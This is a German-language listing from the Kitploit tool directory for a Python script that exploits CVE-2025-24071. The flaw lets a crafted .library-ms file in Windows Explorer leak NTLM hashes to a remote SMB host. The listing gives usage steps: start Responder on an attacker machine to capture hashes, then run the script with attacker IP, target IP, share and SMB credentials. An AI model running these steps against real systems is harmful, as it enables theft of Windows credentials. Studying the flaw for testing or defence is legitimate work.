Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24071 — Python-Skript zur Ausführung von CVE-2025-24071 | Kitploit
Tools/GitHubGitHub/ac8999/cve-2025-24071
Passwort-CrackingSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Python-Skript zur Ausführung von CVE-2025-24071

Repository anzeigen
14vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24071: Microsoft Windows Datei-Explorer Spoofing-Sicherheitslücke (Skript von SilentExploit)

📖 Beschreibung

Dieses Projekt erkennt und demonstriert die Ausnutzung einer Windows Datei-Explorer Spoofing-Sicherheitslücke.

Das Problem ergibt sich aus einer Windows-Bibliotheksdatei (.library-ms), die einen Netzwerkpfad enthält, entweder als direkten Anhang oder eingebettet in ein Archiv.
Wenn geöffnet, kann die Datei dazu führen, dass Windows NTLM-Hashes an einen entfernten (potenziell schädlichen) Netzwerkstandort weitergibt.

POC: https://imgur.com/a/hEO83Se

⚡ Verwendung

1. Responder starten

Führen Sie auf Ihrem Angriffsrechner Responder aus, um NTLM-Hashes zu erfassen:

root@kitploit:~
sudo responder -I tun0 -wvF

2. Das Skript ausführen

Sie können das Skript auf zwei Arten konfigurieren:

✅ Option A: Standardwerte bearbeiten (am einfachsten)

Ändern Sie die Standardparameter direkt im Skript.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Angreifer-IP")      # Ihre IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Ziel-IP")           # Ziel-IP
    parser.add_argument("--share-name", default="IT", help="SMB-Freigabename")            # Name der Freigabe, auf die Sie Zugriff haben (ohne /)
    parser.add_argument("--username", default="USERNAME", help="SMB-Benutzername")        # Benutzername des Freigabebesitzers
    parser.add_argument("--password", default="PASSWORD", help="SMB-Kennwort")            # Kennwort des Freigabebesitzers
    parser.add_argument("--interface", default="tun0", help="Responder-Netzwerkschnittstelle") # Prüfen Sie ifconfig, aber tun0 funktioniert, wenn Sie ein VPN verwenden
    return parser.parse_args()

✅ Option B: Mit CLI-Parametern ausführen

Ausführen mit Argumenten:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ANGREIFER_IP> \
    --target-ip <ZIEL_IP> \
    --share-name <FREIGABE_NAME> \
    --username <BENUTZERNAME> \
    --password <KENNWORT> \
    --interface <SCHNITTSTELLE>
Tool herunterladen